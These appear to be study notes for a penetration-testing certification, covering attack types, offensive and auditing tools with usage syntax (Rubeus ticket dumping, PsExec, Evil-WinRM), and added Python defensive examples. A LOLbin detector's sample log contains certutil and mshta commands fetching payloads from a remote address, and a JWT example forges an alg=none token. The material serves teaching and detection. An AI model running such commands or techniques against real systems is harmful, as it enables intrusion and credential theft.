Definition: A speed-oriented, parallel, modular, login brute-forcer.
Medusa is a fast, parallel, and flexible password-cracking tool used for brute-forcing login credentials across various network services. It is designed to handle large-scale attacks efficiently and supports multiple protocols, making it a valuable tool for penetration testers and security researchers.
Features:
Module Support: Supports various modules for different protocols including HTTP, SSH, and FTP.
Parallel Testing: Allows multiple parallel connections to test login credentials quickly.
Customizability: Users can add new modules or modify existing ones.
Example: Using Medusa to perform a brute-force attack on a web application's login page.
-h [host]: Specifies the target host or IP address.
-U [username file]: Specifies a file with a list of usernames.
-u [username]: Specifies a single username.
-P [password file]: Specifies a file with a list of passwords.
-p [password]: Specifies a single password.
-M [module]: Specifies the protocol or service module to use (e.g., ssh, ftp, http).
ssh: Secure Shell
ftp: File Transfer Protocol
http: Hypertext Transfer Protocol
mysql: MySQL Database
smtp: Simple Mail Transfer Protocol
pop3: Post Office Protocol
imap: Internet Message Access Protocol
rdp: Remote Desktop Protocol
telnet: Telnet Protocol
-t [tasks]: Specifies the number of concurrent connections (threads).
-f: Stops after the first successful login.
-v: Enables verbose output.
Burp Suite
Definition: A comprehensive web application security testing tool.
It provides tools for performing security assessments of web applications, including scanning for vulnerabilities, intercepting and modifying HTTP requests, and analyzing responses.
Features:
Intercepting Proxy: Intercepts and inspects HTTP/S traffic between the browser and the target application.
Scanner: Automated vulnerability scanner to identify common web vulnerabilities.
Repeater: Manually modify and resend individual HTTP requests.
Intruder: Automated attack tool for testing inputs and parameters.
Example: Using Burp Suite to intercept and modify HTTP requests to test for SQL injection vulnerabilities in a web application.
Components
Proxy: Intercepts and modifies HTTP/S traffic between your browser and the target application.
Scanner: Automates the process of scanning for vulnerabilities such as SQL injection, XSS, and more (available in the Professional edition).
Spider: Crawls the application to discover and map all its endpoints and functionality.
Intruder: Performs automated attacks on web application inputs to find vulnerabilities (e.g., brute force, fuzzing).
Repeater: Allows you to manually modify and resend individual HTTP requests to analyze responses.
Decoder: Helps decode and encode data in various formats (e.g., URL encoding, Base64).
Comparer: Compares two sets of data to find differences, useful for analyzing changes in responses or request parameters.
Objective 4.4
Attack Types
Privilege Escalation
Definition: Gaining higher privileges than originally granted.
Examples: Exploiting vulnerabilities, misconfigurations, or weak permissions.
Purpose: Access restricted areas or perform unauthorized actions.
Prevention: Regularly update and patch systems, apply the principle of least privilege, monitor for unusual activity.
Credential Dumping
Definition: Extracting credentials from a system.
Examples: Using tools like Mimikatz to extract passwords, hashes, or Kerberos tickets.
Purpose: Gain unauthorized access to other systems or services.
Prevention: Use of credential guards, monitoring, and limiting access to sensitive information.
Circumventing Security Tools
Definition: Bypassing or disabling security mechanisms.
Examples: Disabling antivirus, bypassing firewalls, or evading IDS/IPS.
Purpose: Avoid detection and continue attack activities.
Prevention: Use tamper-proof security tools, apply layered security, monitor for anomalies.
Log Manipulation
Purpose: Avoid detection and forensic investigation.
Prevention: Secure log storage, regular log audits, use of centralized logging solutions.
Unquoted Service Path Injection
Definition: Exploiting unquoted service paths to execute arbitrary code.
Examples: Creating executables in unquoted paths with spaces to be executed by the system.
Purpose: Gain elevated privileges or run malicious code.
Prevention: Ensure service paths are quoted, review and fix service configurations.
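As an added example (not from the original notes), the following Python audit takes service ImagePath values, here a constructed sample rather than output from a real host, and reports the unquoted paths containing spaces, the intermediate locations Windows would try before the intended binary, and the quoted form that fixes each one.

```python
r"""Audit Windows service ImagePath values for the unquoted-path weakness.

Added example, not part of the original notes. The ImagePath strings below
are constructed samples; in a real audit they come from `sc qc <service>`
or HKLM\SYSTEM\CurrentControlSet\Services\<service>\ImagePath.
"""
import re

# Constructed sample: service name -> ImagePath as the service control manager stores it.
SAMPLE_SERVICES = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -run',
    "VulnSvc": r"C:\Program Files\Acme Tools\agent service\agent.exe -k start",
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "SysRootSvc": r"%SystemRoot%\System32\spoolsv.exe",
}

# An unquoted ImagePath is split at the first token that ends in .exe; the
# remainder is passed to the binary as arguments.
_EXE_RE = re.compile(r"(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_image_path(image_path):
    """Return (exe, args) for an unquoted path, or None when quoted or unparsable."""
    if image_path.startswith('"'):
        return None
    m = _EXE_RE.match(image_path)
    if not m:
        return None
    return m.group(1), (m.group(2) or "")


def lookup_candidates(exe):
    r"""Paths CreateProcess tries, in order, before the intended binary.

    For C:\Program Files\Acme Tools\agent service\agent.exe it tries
    C:\Program.exe, then C:\Program Files\Acme.exe, then
    C:\Program Files\Acme Tools\agent.exe (".exe" is appended because the
    candidate has no extension). No spaces in the path means nothing to try.
    """
    candidates = []
    idx = exe.find(" ")
    while idx != -1:
        candidates.append(exe[:idx] + ".exe")
        idx = exe.find(" ", idx + 1)
    return candidates


def audit(services):
    """Return {name: {"candidates": [...], "fixed": quoted_path}} for weak services.

    A service is reported only when its path is unquoted AND the executable
    part contains a space, which is the configuration the notes describe.
    Each directory in `candidates` should be checked to confirm unprivileged
    users cannot write to it, and the ImagePath should be changed to `fixed`.
    """
    findings = {}
    for name, path in services.items():
        parts = split_image_path(path)
        if parts is None:
            continue
        exe, args = parts
        candidates = lookup_candidates(exe)
        if not candidates:
            continue
        findings[name] = {"candidates": candidates, "fixed": f'"{exe}"{args}'}
    return findings


if __name__ == "__main__":
    for name, info in audit(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path with spaces")
        for c in info["candidates"]:
            print(f"  would be tried first: {c}")
        print(f"  corrected ImagePath:  {info['fixed']}")
```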
Tools
Mimikatz
Definition: A post-exploitation tool used for extracting plaintext passwords, hashes, PINs, and Kerberos tickets from memory.
Mimikatz is commonly used by security professionals for penetration testing and by attackers to escalate privileges or move laterally within a network.
Features:
Dump Credentials: Extract passwords and hashes from memory.
Pass-the-Hash: Use NTLM hashes to authenticate without requiring plaintext passwords.
Pass-the-Ticket: Use Kerberos tickets to access services.
Kerberoasting: Extract service tickets from memory for offline cracking.
Golden Ticket: Create and inject forged Kerberos tickets for domain-wide access.
Silver Ticket: Create and inject forged Kerberos service tickets.
Example: Using Mimikatz to dump user credentials from a compromised machine's memory.
Rubeus
Definition: Rubeus is a post-exploitation tool written in C# that interacts with the Kerberos authentication protocol.
It is used for various activities related to Kerberos tickets and authentication, including ticket extraction, manipulation, and forging.
Rubeus is particularly useful for security professionals and attackers in performing advanced Kerberos-based attacks, such as Pass-the-Ticket (PTT), Kerberoasting, and Golden Ticket attacks.
Features:
Dump Kerberos Tickets: Extract TGTs (Ticket Granting Tickets) and service tickets from memory.
Pass-the-Ticket: Inject and use Kerberos tickets for authentication.
Kerberoasting: Extract service tickets for offline cracking.
Golden Ticket: Create and inject forged Kerberos tickets for domain-wide access.
Silver Ticket: Create and inject forged Kerberos service tickets.
Ticket Renewal: Renew existing tickets and adjust their expiration.
Example: Using Rubeus to renew an expired Kerberos ticket to maintain access without re-entering credentials.
Usage:
Dumping Kerberos Tickets → Rubeus.exe dump
Pass-the-Ticket → Rubeus.exe ptt /ticket:[path_to_ticket]
Certify
Definition: Certify is a tool for enumerating and abusing misconfigurations in Active Directory Certificate Services (AD CS).
It interacts with enterprise Certificate Authorities (CAs) to identify vulnerable certificate templates and to request certificates that can then be used to authenticate as other accounts.
Features:
Certificate Request: Requests certificates with specific attributes.
Certificate Abuse: Exploits misconfigurations in AD CS to escalate privileges.
Example: Using Certify to request a certificate for a privileged account and using it to authenticate as that account.
Seatbelt
Definition: Seatbelt is a post-exploitation tool used for information gathering and privilege escalation on Windows systems.
It is designed to enumerate and collect various system and user information, which can be useful for further exploitation or understanding the target environment.
Seatbelt can identify potential privilege escalation vectors, such as unpatched vulnerabilities or misconfigured permissions.
Features:
System Enumeration: Gathers detailed information about the system, including installed software, running processes, and security settings.
Credential Enumeration: Identifies potential credentials and sensitive data.
Example: Using Seatbelt to gather information about installed security software and system configurations on a compromised machine.
Usage → Seatbelt.exe
Flags:
-p: Collects information about potential privilege escalation paths.
-n: Collects network-related information, such as network shares and connections.
-s: Collects system information, including OS version and installed software.
PowerShell
Definition: A task automation and configuration management framework from Microsoft, with a scripting language and a command-line shell.
PowerShell Integrated Scripting Environment (ISE) is a graphical user interface (GUI) for PowerShell, providing a more user-friendly environment for writing, testing, and debugging PowerShell scripts.
Features:
Script Editor: A multi-line editor with syntax highlighting for writing and editing PowerShell scripts.
Console Pane: A PowerShell console for executing commands interactively.
Debugging Tools: Built-in tools for debugging scripts, including breakpoints, step execution, and variable inspection.
Integrated Help: Provides context-sensitive help for cmdlets and functions.
Example: Using PowerShell to execute scripts that enumerate system information or deploy malware.
Usage:
Get-Command: Lists all available cmdlets, functions, workflows, aliases, and scripts.
Get-Help: Provides help documentation for cmdlets and functions.
Get-Process: Retrieves information about running processes.
Set-ExecutionPolicy: Configures the script execution policy.
Invoke-Command: Executes commands on remote systems.
PsExec
Definition: A command-line utility from Microsoft’s Sysinternals suite that allows administrators to execute processes on remote systems and interact with them as if they were sitting at the console of the remote machine.
It is commonly used for remote administration, troubleshooting, and scripting in Windows environments.
PsExec can be used to run processes with elevated privileges, create remote shells, and execute commands across multiple systems.
Features:
Remote Execution: Run commands and executables on remote systems.
Interactive Sessions: Start interactive sessions on remote systems.
Privilege Management: Execute commands with different user privileges, including SYSTEM.
No Installation Required: PsExec does not need to be installed on the remote systems; it runs as a standalone executable.
Example: Using PsExec to run a script on a remote system to deploy malware or extract data.
Usage:
Run a Command on a Remote System → psexec \\RemotePC -u [username] -p [password] [command]
Run a Command with SYSTEM Privileges → psexec \\RemotePC -s [command]
Redirect Output to a File → psexec \\RemotePC -u [username] -p [password] [command] > output.txt
Execute a Command on Multiple Systems → psexec \\System1,\\System2,\\System3 -u [username] -p [password] [command]
Evil-WinRM
Definition: Evil-WinRM is a Ruby-based tool used for remote management of Windows systems over WinRM (Windows Remote Management).
It is often used in penetration testing and red teaming engagements to exploit WinRM vulnerabilities, gain remote access, and execute commands on target systems.
Evil-WinRM can be employed to perform various administrative tasks, exploit WinRM misconfigurations, and facilitate post-exploitation activities.
Features:
Remote Command Execution: Execute commands and scripts on remote Windows systems via WinRM.
Interactive Shell: Provides an interactive command shell on the remote system.
Credential Management: Supports passing credentials for authentication and session management.
File Upload/Download: Allows uploading and downloading files from the remote system.
Example: Using Evil-WinRM to gain a remote shell on a compromised Windows machine and execute commands.
Usage:
Connecting to a Remote System → evil-winrm -i [IP_ADDRESS] -u [USERNAME] -p [PASSWORD]
Living Off the Land Binaries (LOLbins)
Definition: Using legitimate, built-in system binaries to perform malicious actions.
Living Off the Land Binaries (LOLbins) refers to the practice of using legitimate, pre-installed binaries and tools available on a system to achieve objectives like privilege escalation, persistence, or data exfiltration without deploying new, malicious software.
This technique leverages existing system binaries that can be exploited to perform actions typically associated with malicious activities.
The advantage of LOLbins is that they often evade detection by traditional security solutions since they are legitimate system components.
Examples:
mshta.exe: Executes HTML applications (HTA files) and can be used to execute scripts.
powershell.exe: Executes PowerShell scripts for various tasks.
certutil.exe: Downloads and installs certificates but can be used to download files from the internet.
Purpose: Avoid detection by using trusted system binaries for malicious activities.
Example: Using certutil.exe to download and execute a malicious payload on a compromised machine.
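Added example, not from the original notes: a small Python detector that runs over constructed process-creation log lines and flags the LOLbin invocation patterns named above (certutil.exe or mshta.exe launched with a remote URL, powershell.exe with an encoded command), while letting benign uses of the same binaries through. The key=value log layout, host and user names, and the 198.51.100.7 address are assumptions made for the sample.

```python
"""Flag LOLbin abuse in process-creation logs.

Added example, not part of the original notes. The log lines are a
constructed sample in a simple key=value layout (a real feed would be
Sysmon Event ID 1 or Windows Security event 4688). The point is the
rule logic: the same binaries appear in benign and suspicious use, so
the detection keys on how they are invoked, not merely that they ran.
"""
import ntpath
import re

# Constructed sample events (198.51.100.7 is a documentation address).
SAMPLE_LOG = [
    r"ts=2024-05-01T09:00:01Z host=WS01 user=alice image=C:\Windows\System32\certutil.exe cmd=certutil.exe -hashfile C:\Temp\installer.msi SHA256",
    r"ts=2024-05-01T09:02:13Z host=WS01 user=alice image=C:\Windows\System32\certutil.exe cmd=certutil.exe -urlcache -f http://198.51.100.7/update.dat C:\Users\Public\update.dat",
    r"ts=2024-05-01T09:05:40Z host=WS02 user=svc_backup image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r"ts=2024-05-01T09:07:02Z host=WS02 user=bob image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -NoProfile -EncodedCommand QQBCAEMA",
    r"ts=2024-05-01T09:09:55Z host=WS03 user=carol image=C:\Windows\System32\mshta.exe cmd=mshta.exe http://198.51.100.7/page.hta",
    r"ts=2024-05-01T09:11:17Z host=WS03 user=carol image=C:\Windows\System32\mshta.exe cmd=mshta.exe C:\Program Files\Vendor\setup.hta",
]

# key=value pairs; the value runs until the next " key=" or end of line,
# so the final cmd field may contain spaces.
_FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
_URL_RE = re.compile(r"https?://", re.IGNORECASE)
# powershell.exe accepts -e, -enc and -EncodedCommand for the same switch.
_ENCODED_RE = re.compile(r"-e(nc(odedcommand)?)?\b", re.IGNORECASE)


def parse_event(line):
    """Turn one key=value log line into a dict."""
    return {k: v for k, v in _FIELD_RE.findall(line)}


def classify(event):
    """Return a reason string when the event matches a LOLbin-abuse pattern, else None."""
    image = ntpath.basename(event.get("image", "")).lower()
    cmd = event.get("cmd", "")
    if image in ("certutil.exe", "mshta.exe") and _URL_RE.search(cmd):
        return f"{image} invoked with a remote URL"
    if image == "powershell.exe":
        if _ENCODED_RE.search(cmd):
            return "powershell.exe launched with an encoded command"
        if _URL_RE.search(cmd):
            return "powershell.exe command line contains a remote URL"
    return None


def detect(lines):
    """Run classify over every line and return the alerts in log order."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        reason = classify(event)
        if reason:
            alerts.append({
                "ts": event.get("ts"),
                "host": event.get("host"),
                "user": event.get("user"),
                "image": ntpath.basename(event.get("image", "")).lower(),
                "reason": reason,
            })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['ts']} {a['host']} {a['user']}: {a['reason']}")
```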
Objective 4.5
Attack Types
Brute-force Attack
Definition: Systematically trying all possible combinations of passwords or encryption keys.
Examples: Using automated tools to guess passwords or decrypt data.
Prevention: Implement account lockout mechanisms, use strong passwords, and employ rate limiting.
Collision Attack
Definition: Exploiting hash function weaknesses to find two inputs that produce the same hash value.
Examples: Generating two different documents with the same hash value to trick digital signature verification.
Prevention: Use collision-resistant hash functions like SHA-256.
Directory Traversal
Definition: Exploiting insufficient input validation to access directories and files outside of the web root directory.
Examples: Using “../” sequences to navigate to restricted directories.
Prevention: Validate and sanitize user inputs, restrict file access permissions.
Server-Side Request Forgery (SSRF)
Definition: Exploiting a server to make requests to unintended locations, often to internal systems.
Examples: Forcing a server to make requests to local network services or metadata endpoints.
Prevention: Validate and sanitize URLs, restrict outbound traffic.
Cross-Site Request Forgery (CSRF)
Definition: Forcing a user to execute unwanted actions on a web application where they are authenticated.
Examples: Sending a crafted link to a user to perform actions like changing passwords or transferring funds.
Prevention: Implement anti-CSRF tokens, use same-site cookies, and ensure state changes require re-authentication.
Deserialization Attack
Definition: Exploiting insecure deserialization to execute arbitrary code or carry out unauthorized actions.
Examples: Manipulating serialized objects to execute commands or elevate privileges.
Prevention: Use safe serialization libraries, validate and sanitize serialized data.
Injection Attacks
SQL Injection
Definition: Inserting malicious SQL queries via input fields.
Examples: Exploiting input fields to run unauthorized SQL commands.
Prevention: Use parameterized queries, validate and sanitize inputs.
Command Injection
Definition: Injecting commands to be executed by the system shell.
Examples: Input fields allowing shell commands to be executed.
Prevention: Validate inputs, use secure coding practices.
Cross-Site Scripting (XSS)
Definition: Injecting malicious scripts into web pages viewed by other users.
Examples: Executing JavaScript in a user’s browser to steal cookies or deface websites.
Prevention: Encode outputs, validate and sanitize inputs.
Server-Side Template Injection
Definition: Injecting code into templates that are processed on the server side.
Examples: Manipulating template variables to execute server-side code.
Prevention: Use secure template engines, validate and sanitize template inputs.
Insecure Direct Object Reference (IDOR)
Definition: Accessing objects directly using user-supplied input without proper authorization checks.
Examples: Manipulating URL parameters to access other users’ data.
Prevention: Implement access controls and authorization checks.
Session Hijacking
Definition: Stealing or manipulating session tokens to gain unauthorized access.
Examples: Using stolen session cookies to impersonate a user.
Prevention: Use secure cookies, implement session expiration, use HTTPS.
Arbitrary Code Execution
Definition: Executing arbitrary code on a target system.
Examples: Exploiting vulnerabilities to run unauthorized code.
Prevention: Regularly update and patch systems, use exploit mitigation techniques.
File Inclusions
Remote File Inclusion (RFI)
Definition: Including remote files via input fields.
Examples: Using URLs in input fields to include malicious scripts.
Prevention: Restrict file inclusion, validate and sanitize inputs.
Local File Inclusion (LFI)
Definition: Including local files via input fields.
Examples: Using file paths in input fields to access sensitive files.
Prevention: Restrict file inclusion, validate and sanitize inputs.
Web Shell
Definition: Uploading scripts that provide remote access to a server.
Examples: Using file upload vulnerabilities to deploy a shell.
Prevention: Validate and sanitize file uploads, use secure configurations.
API Abuse
Definition: Exploiting weaknesses in APIs to perform unauthorized actions.
Examples: Manipulating API requests to bypass authentication or extract sensitive data.
Prevention: Implement strong authentication and authorization, validate and sanitize inputs.
JSON Web Token (JWT) Manipulation
Definition: Tampering with JWT payloads or signatures to gain unauthorized access.
Examples: Modifying JWT claims to elevate privileges or bypass authentication.
Prevention: Use strong signing algorithms, validate JWT integrity, and implement proper key management.
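Added example, not from the original notes, in Python using only the standard library: an HS256 token issuer, a verifier that trusts the token's own alg header (the pattern that lets claim tampering succeed), and a hardened verifier that pins the algorithm server-side, compares signatures in constant time, and enforces exp. The secret, claims and timestamps are constructed values.

```python
"""JWT verification: the insecure pattern beside the hardened one.

Added example, not part of the original notes. Tokens are HS256-signed
with a constructed secret; make_unsigned_token builds the kind of
tampered "alg": "none" token a hardened verifier must reject.
"""
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-example-secret-not-for-production"


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_part(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload, secret):
    """Issue a token the way a server would."""
    signing_input = _encode_part({"alg": "HS256", "typ": "JWT"}) + "." + _encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def make_unsigned_token(payload):
    """Attacker-controlled input: header claims alg none and the signature is empty."""
    return _encode_part({"alg": "none", "typ": "JWT"}) + "." + _encode_part(payload) + "."


def tamper_payload(token, new_payload):
    """Attacker-controlled input: payload swapped, original signature kept."""
    h, _, s = token.split(".")
    return h + "." + _encode_part(new_payload) + "." + s


def verify_insecure(token, secret, now=None):
    """Vulnerable pattern: the algorithm is read from the untrusted header.

    Honouring "none" lets any client mint a token with whatever claims it
    likes; the signature comparison is not constant-time; exp is ignored.
    """
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if b64url_encode(expected) == s:
            return json.loads(b64url_decode(p))
    raise ValueError("invalid token")


def verify_hardened(token, secret, now=None):
    """Pin the algorithm server-side, compare in constant time, enforce exp."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(p))
    now = time.time() if now is None else now
    if not isinstance(payload.get("exp"), (int, float)) or payload["exp"] <= now:
        raise ValueError("missing or expired exp")
    return payload


def accepted(verifier, token, secret, now):
    """True when the verifier returns a payload, False when it raises ValueError."""
    try:
        verifier(token, secret, now)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    now = 1_900_000_000
    good = sign_hs256({"sub": "alice", "role": "user", "exp": 2_000_000_000}, SECRET)
    forged = make_unsigned_token({"sub": "alice", "role": "admin", "exp": 2_000_000_000})
    print("insecure accepts alg=none:", accepted(verify_insecure, forged, SECRET, now))
    print("hardened accepts alg=none:", accepted(verify_hardened, forged, SECRET, now))
    print("hardened accepts valid token:", accepted(verify_hardened, good, SECRET, now))
```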
Tools
TruffleHog
Purpose: Searches through git repositories for high entropy strings and secrets, such as passwords or API keys.
Use Case: Secrets enumeration, credential dumping.
Example: Finding accidentally committed AWS secret keys in a public repository.
Burp Suite
Purpose: Comprehensive web vulnerability scanner and testing tool.
Use Case: Web application testing, manual testing, and automated scanning for vulnerabilities like SQL injection, XSS, and CSRF.
Example: Intercepting and modifying web traffic to test for injection vulnerabilities.
Zed Attack Proxy (ZAP)
Purpose: Open-source web application security scanner.
Use Case: Finding security vulnerabilities in web applications during development and testing phases.
Example: Automating scans to identify common web vulnerabilities like XSS and SQL injection.
Postman
Purpose: API development and testing tool.
Use Case: API testing, exploring API endpoints, and validating API responses.
Example: Testing RESTful APIs for improper configurations and potential abuses.
sqlmap
Purpose: Automated tool for SQL injection and database takeover.
Use Case: Identifying and exploiting SQL injection vulnerabilities.
Example: Automating the process of detecting and exploiting SQL injection points to extract data from databases.
Gobuster/DirBuster
Purpose: Directory and file brute-forcing tools.
Use Case: Finding hidden directories and files on a web server.
Example: Enumerating directories and files to uncover sensitive information not meant to be publicly accessible.
Wfuzz
Purpose: Web application brute-forcing tool for directories, files, and parameters.
Use Case: Fuzzing web applications to discover vulnerabilities like directory traversal and file inclusions.
Example: Brute-forcing URL parameters to discover hidden endpoints and potential vulnerabilities.
Pacu
Purpose: Open-source AWS exploitation framework.
Use Case: Performing security assessments on AWS environments to identify misconfigurations and vulnerabilities.
Example: Testing for weak IAM policies, S3 bucket permissions, and other AWS-specific issues.
Prevention: Regularly audit and review AWS configurations using Pacu to identify and remediate security gaps.
Usage → python3 pacu.py
Docker Bench
Purpose: Security auditing tool for Docker containers.
Docker Bench for Security is an open-source script that checks for common best practices around the deployment and configuration of Docker containers in production.
It helps in assessing the security of Docker installations against the benchmarks provided by the Center for Internet Security (CIS).
Features:
Security Checks: Runs a series of checks to ensure Docker is securely configured.
CIS Benchmark: Aligns with the CIS Docker Benchmark recommendations.
Detailed Reports: Provides detailed reports on the findings and recommendations.
Automated and Manual Use: Can be run manually or integrated into automated security workflows.
Use Case: Checking Docker configurations against security best practices.
Example: Ensuring Docker daemon configuration is secure, container settings are appropriate, and security options are enabled.
Prevention: Run Docker Bench regularly to ensure Docker containers are configured securely.
Usage → sh docker-bench-security.sh
Kube-hunter
Purpose: Kubernetes security auditing tool.
Kube-hunter is an open-source tool designed to perform security assessments on Kubernetes clusters.
It identifies potential security issues and vulnerabilities in Kubernetes environments, helping administrators and security professionals secure their clusters.
Features:
Automated Scanning: Automatically scans Kubernetes clusters for security vulnerabilities.
Extensive Coverage: Checks for a wide range of security issues, including misconfigurations and exposed services.
Detailed Reports: Provides detailed reports on discovered vulnerabilities and potential security issues.
Interactive and Network Scanning: Supports both interactive (direct access) and network scanning modes.
Use Case: Scanning Kubernetes clusters for security issues and misconfigurations.
Example: Identifying open ports, insecure configurations, and vulnerabilities in a Kubernetes environment.
Prevention: Use Kube-hunter to regularly scan Kubernetes clusters and address identified issues to enhance cluster security.
Usage:
Scans the network for Kubernetes clusters → kube-hunter --remote <TARGET_IP>
Prowler
Purpose: AWS security best practices assessment tool.
Prowler is an open-source tool designed to perform security best practices assessments, audits, incident response, continuous monitoring, and compliance checks on AWS environments.
It helps ensure that your AWS accounts adhere to the best practices and compliance standards set by organizations like the Center for Internet Security (CIS), General Data Protection Regulation (GDPR), and others.
Key Features:
Security Assessments: Conducts security best practices assessments based on AWS CIS Benchmark.
Compliance Checks: Includes checks for GDPR, HIPAA, ISO 27001, and more.
Automated and Manual Use: Can be used interactively or integrated into CI/CD pipelines.
Detailed Reporting: Generates detailed reports with findings and recommendations.
Use Case: Auditing AWS accounts for security best practices and compliance.
Example: Checking IAM policies, S3 bucket configurations, CloudTrail logs, and other AWS resources.
Prevention: Implement Prowler to continuously monitor AWS environments for security compliance and best practices.
ScoutSuite
Purpose: Multi-cloud security-auditing tool.
ScoutSuite is an open-source multi-cloud security-auditing tool that helps assess the security posture of cloud environments.
It supports AWS, Azure, Google Cloud Platform (GCP), and other cloud providers.
ScoutSuite uses the cloud providers' APIs to gather configuration data and then analyzes the information to provide a comprehensive report on security issues and best practices.
Features:
Multi-Cloud Support: Audits AWS, Azure, GCP, and other cloud environments.
Comprehensive Reporting: Generates detailed reports highlighting security issues and recommendations.
Easy to Use: Simple CLI interface for easy execution.
Customizable: Allows customization of checks and reporting.
Interactive Reports: Produces interactive HTML reports for better visualization of findings.
Use Case: Assessing the security posture of cloud environments such as AWS, Azure, and Google Cloud.
Example: Identifying misconfigurations, insecure policies, and other security risks across different cloud platforms.
Prevention: Utilize ScoutSuite to perform regular security audits across multi-cloud environments and remediate identified risks.
Usage:
Scanning an AWS Environment → scoutsuite aws --profile <AWS_PROFILE>
Scanning an Azure Environment → scoutsuite azure --subscription <SUBSCRIPTION_ID>
Cloud-Native Vendor Tools
Purpose: Tools provided by cloud vendors for security assessment and monitoring.
Cloud-native vendor tools are provided by cloud service providers like AWS, Azure, and Google Cloud Platform (GCP) to help users manage, monitor, and secure their cloud environments.
These tools are designed to work seamlessly with their respective cloud platforms, providing deep integration and extensive features.
Use Case: Utilizing built-in cloud services for security management and compliance.
Examples:
AWS Security Hub: Centralized security management for AWS.
Azure Security Center: Unified security management and advanced threat protection.
Google Cloud Security Command Center: Security and risk management for Google Cloud resources.
Prevention: Leverage these cloud-native tools to continuously monitor and improve the security posture of cloud environments, ensuring compliance and detecting potential threats.
Objective 4.7
Attack Types
Wardriving
Definition: Searching for Wi-Fi networks by driving around with a device that detects wireless networks.
Purpose: Identifying vulnerable Wi-Fi networks for potential exploitation.
Example: Using a laptop with Wi-Fi scanning software to map out available networks in a neighborhood.
Prevention: Secure Wi-Fi networks with strong encryption (WPA3), hide SSIDs, and limit signal range.
Evil Twin Attack
Definition: Setting up a rogue Wi-Fi access point that mimics a legitimate one to intercept data.
Purpose: Stealing sensitive information by tricking users into connecting to the rogue network.
Example: An attacker creates a Wi-Fi network named "CoffeeShopWiFi" to lure customers of a nearby coffee shop.
Prevention: Educate users to verify Wi-Fi network names, use VPNs, and enable mutual authentication.
Signal Jamming
Definition: Disrupting wireless communications by overwhelming the network with interference signals.
Purpose: Denying access to legitimate users by causing network disruption.
Example: Using a signal jammer to disrupt Wi-Fi connectivity in a specific area.
Prevention: Implementing spread spectrum technologies, using robust wireless protocols, and securing physical locations.
Protocol Fuzzing
Definition: Sending malformed or unexpected data to a network protocol to discover vulnerabilities.
Purpose: Identifying security flaws in network protocols that can be exploited.
Example: Sending random data to a Bluetooth protocol to find buffer overflow vulnerabilities.
Prevention: Regularly update and patch protocols, use secure coding practices, and employ robust error handling.
Packet Crafting
Definition: Creating custom network packets to test the behavior of network devices or protocols.
Purpose: Identifying weaknesses in how devices handle unusual or malicious packets.
Example: Using tools like Scapy to send specially crafted TCP packets to a firewall.
Prevention: Apply network hardening techniques, use intrusion detection systems (IDS), and regularly audit network configurations.
Deauthentication
Definition: Forcing devices to disconnect from a Wi-Fi network by sending deauthentication frames.
Purpose: Disrupting user connections to capture re-authentication data or cause denial of service.
Example: Using a deauthentication tool to force devices off a network, making them reconnect to a rogue access point.
Prevention: Use WPA3, implement management frame protection (802.11w), and monitor for unusual disconnections.
Captive Portal
Definition: Intercepting and redirecting user traffic to a login page before granting internet access.
Purpose: Often used legitimately in public Wi-Fi to control access, but can be exploited for phishing.
Example: A hotel uses a captive portal to require guest login for Wi-Fi access, but an attacker could create a fake portal to steal credentials.
Prevention: Use HTTPS on captive portals, educate users about phishing risks, and implement secure authentication methods.
Wi-Fi Protected Setup (WPS) Personal Identification Number (PIN) Attack
Definition: Exploiting vulnerabilities in the WPS PIN feature to gain access to a Wi-Fi network.
Purpose: Bypassing WPA/WPA2 security by brute-forcing the WPS PIN.
Example: Using tools like Reaver to attempt various PIN combinations on a WPS-enabled router.
Prevention: Disable WPS on routers, use strong WPA3 encryption, and ensure routers are up to date with security patches.
Tools
WPAD (Web Proxy Auto-Discovery Protocol)
Purpose: Automates the discovery of web proxy configuration files.
The Web Proxy Auto-Discovery Protocol (WPAD) is a protocol used by clients to automatically locate a proxy configuration file, typically called wpad.dat, which provides the settings needed to connect to the internet through a proxy server.
This protocol helps in managing proxy settings across a large network and simplifies the configuration process for end-users.
Features:
Automatic Proxy Configuration: Allows clients to automatically discover and configure the appropriate proxy settings without manual intervention.
Ease of Management: Simplifies the management of proxy settings across a network by centralizing the configuration.
Support for Multiple Platforms: Works with various operating systems and web browsers that support automatic proxy configuration.
Use Case: Can be used maliciously to redirect traffic through a malicious proxy.
Example: Attacker sets up a rogue WPAD server to intercept and monitor web traffic.
Prevention: Disable WPAD in network settings and enforce the use of secure proxies.
WiFi-Pumpkin
Purpose: Framework for rogue access point attacks.
WiFi-Pumpkin is an open-source framework for conducting wireless network security assessments and attacks.
It is designed to facilitate various wireless network attacks, such as creating rogue access points, performing man-in-the-middle (MITM) attacks, and capturing network traffic.
WiFi-Pumpkin provides a user-friendly interface and powerful tools for network penetration testing and auditing.
Features:
